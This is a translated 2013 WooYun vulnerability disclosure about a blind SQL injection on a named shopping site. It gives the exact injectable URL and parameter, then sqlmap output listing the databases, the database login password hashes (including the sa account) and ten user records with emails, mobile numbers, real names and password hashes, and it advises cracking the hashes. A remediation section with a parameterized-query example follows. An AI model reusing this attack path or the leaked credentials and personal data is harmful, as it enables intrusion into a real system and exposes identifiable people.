
Vulnerability summary

Defect ID: wooyun-2013-040913

Title: 壳壳虫 SQL Server blind injection leads to user data leak

Related vendor: 壳壳虫订购台

Author: 迷雾

Submitted: 2013-10-24 17:47

Fix deadline: 2013-12-08 17:48

Published: 2013-12-08 17:48

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2013-10-24: actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed
2013-12-08: the vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

A page on the cocochong main site has a blind SQL injection vulnerability that leaks user data and allows the database to be dumped.

Detailed description:

1. Injection URL: http://www.cocochong.com/ajax/ajax.aspx?str=1&type=getart2
Injectable parameter: str

2. Use sqlmap to enumerate the system's databases
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [20]:
[*] back_newcoco
[*] coco_easy
[*] coco_easyliulan
[*] coco_liulan
[*] coco_ljl
[*] coco_meiti
[*] hkcocochong
[*] hzp_coco
[*] ludinggong
[*] master
[*] model
[*] msdb
[*] new_cocoljl
[*] noya
[*] qg
[*] temp_newcoco
[*] tempdb
[*] Test
[*] toupaicocochong
[*] zhileng
3. Enumerate the current database users and their password hashes
database management system users password hashes:
[*] cocochongCYL [1]:
password hash: 0x01004a4661774b0b3214f68cf8c522ad728cad7b24a14275455c
header: 0x0100
salt: 4a466177
mixedcase: 4b0b3214f68cf8c522ad728cad7b24a14275455c
[*] sa [1]:
password hash: 0x01004086ceb6e37abf38663d2b696ba773e81546d404e321266c
header: 0x0100
salt: 4086ceb6
mixedcase: e37abf38663d2b696ba773e81546d404e321266c
Crack the password hashes with a tool such as Cain.
4. List all tables in the database back_newcoco
Database: back_newcoco
[11 tables]
+-----------------------+
| coco_centerprobyclass |
| coco_focusmap |
| coco_order |
| coco_orderitem |
| coco_paylog |
| coco_plan |
| coco_product |
| coco_productclass |
| coco_question |
| coco_remart |
| coco_user |
5. View the structure of the table coco_user
Database: back_newcoco
Table: coco_user
[23 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| address | nvarchar |
| answer | nvarchar |
| Balance | money |
| birthday | datetime |
| city | nvarchar |
| deliverdate | int |
| email | nvarchar |
| gender | bit |
| isreeze | bigint |
| LoginCount | int |
| mobile | nvarchar |
| paytype | int |
| question | nvarchar |
| realname | nvarchar |
| regtime | datetime |
| state | tinyint |
| tel | nvarchar |
| UserExp | int |
| UserExp2 | int |
| userid | int |
| username | nvarchar |
| userpassword | nvarchar |
| zipcode | nvarchar |
6. Dump the information of 100 users
Database: back_newcoco
Table: coco_user
[10 entries]
+---------------------+-------------+------------------+----------+----------------------------------+
| email | mobile | username | realname | userpassword |
+---------------------+-------------+------------------+----------+----------------------------------+
| [email protected] | 13671947811 | 13671947811 | <blank> | D8159D894C4FA54AF10E475F2AE1972E |
| <[email protected] | <blank> | xd夏丹 | <blank> | 402A7F59F21515E882EE3A99E7D5F183 |
| [email protected] | wewewewewe | ceshi04 | 111111 | 25F9E794323B453885F5181F1B624D0B |
| [email protected] | 13428968481 | 13428968481 | 黄晓敏 | 7AD3A320E79D70D802DD8376590D85ED |
| [email protected] | 13921209904 | 13921209904 | 钱丽娜 | FB138CFB652FF629DC2057362628BDCB |
| [email protected] | 13914700418 | 13914700418 | 陈明 | 870A6E0FC19379F8EE2C8C53D463D930 |
| [email protected] | <blank> | 1003778615 | <blank> | 0AFBB701F9445582EDA0AD065C4AF9BF |
| [email protected] | 13683027007 | 13683027007 | 安晓奕 | A66DA0F0840D7E6C3591AEA32439E4ED |
| [email protected] | 18012578306 | [email protected] | 杨辉 | BE676B6DE825F5F00249359E4AB69F9B |
| [email protected] | 18669259588 | vip | 林姗姗 | E10ADC3949BA59ABBE56E057F20F883E |
+---------------------+-------------+------------------+----------+----------------------------------+

Proof of vulnerability:

Demonstrated above.

Remediation:

Strictly validate and filter all user input.
Monitor and analyse database operations.
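The remediation above amounts to two controls: never let request input reach the query text, and record what the application rejects. The following is an added example, not the vendor's code: a hypothetical ASP.NET handler for the reported endpoint (`/ajax/ajax.aspx?str=...&type=getart2`) that shows the concatenation pattern behind this class of defect beside a hardened version. The table name `coco_article`, the column `title`, the connection string, the assumption that `str` is a numeric ID (the report only shows `str=1`), and the logging sink are all placeholders.

```csharp
// Added example (not the vendor's code). Hypothetical handler for
// /ajax/ajax.aspx?str=<id>&type=getart2. Table, column and connection
// string are placeholders; `str` is assumed to be a numeric ID.
using System;
using System.Data;
using System.Data.SqlClient;
using System.Web;

public class AjaxHandler : IHttpHandler
{
    private const string ConnectionString = "<connection string placeholder>";

    public bool IsReusable { get { return false; } }

    public void ProcessRequest(HttpContext ctx)
    {
        string str = ctx.Request.QueryString["str"];
        string type = ctx.Request.QueryString["type"];

        // Whitelist the action name instead of treating it as free text.
        if (type == "getart2")
        {
            ctx.Response.ContentType = "text/plain";
            ctx.Response.Write(GetArticleSafe(str));
        }
        else
        {
            ctx.Response.StatusCode = 400;
        }
    }

    // Defective pattern, kept only for contrast: the raw request value is
    // spliced into the SQL text, so whatever arrives in `str` is parsed as
    // SQL by the server. This is the defect class the report exploits.
    private static string GetArticleVulnerable(string str)
    {
        string sql = "SELECT title FROM coco_article WHERE id = " + str;  // hypothetical table
        using (SqlConnection conn = new SqlConnection(ConnectionString))
        using (SqlCommand cmd = new SqlCommand(sql, conn))
        {
            conn.Open();
            object result = cmd.ExecuteScalar();
            return result == null ? "" : result.ToString();
        }
    }

    // Hardened version: (1) the input is checked against the type the page
    // actually needs, (2) the value is bound as a typed parameter and is never
    // part of the query text, (3) rejected input is logged for monitoring.
    private static string GetArticleSafe(string str)
    {
        int id;
        if (!int.TryParse(str, out id) || id <= 0)
        {
            LogRejected("str", str);
            return "";
        }

        const string sql = "SELECT title FROM coco_article WHERE id = @id";  // hypothetical table
        using (SqlConnection conn = new SqlConnection(ConnectionString))
        using (SqlCommand cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            conn.Open();
            object result = cmd.ExecuteScalar();
            return result == null ? "" : result.ToString();
        }
    }

    private static void LogRejected(string name, string value)
    {
        // Placeholder sink; route this to the application's real log so that
        // repeated rejections on one parameter are visible to monitoring.
        System.Diagnostics.Trace.TraceWarning("Rejected parameter {0}={1}", name, value);
    }
}
```

Parameterisation closes the injection itself. A second, independent control is the privilege of the login the application connects with: the report was able to list all twenty databases and read login password hashes through a single page, which a login limited to the tables that page needs would not permit.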

Copyright notice: when reposting, please credit the source: 迷雾@乌云


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively refused the report.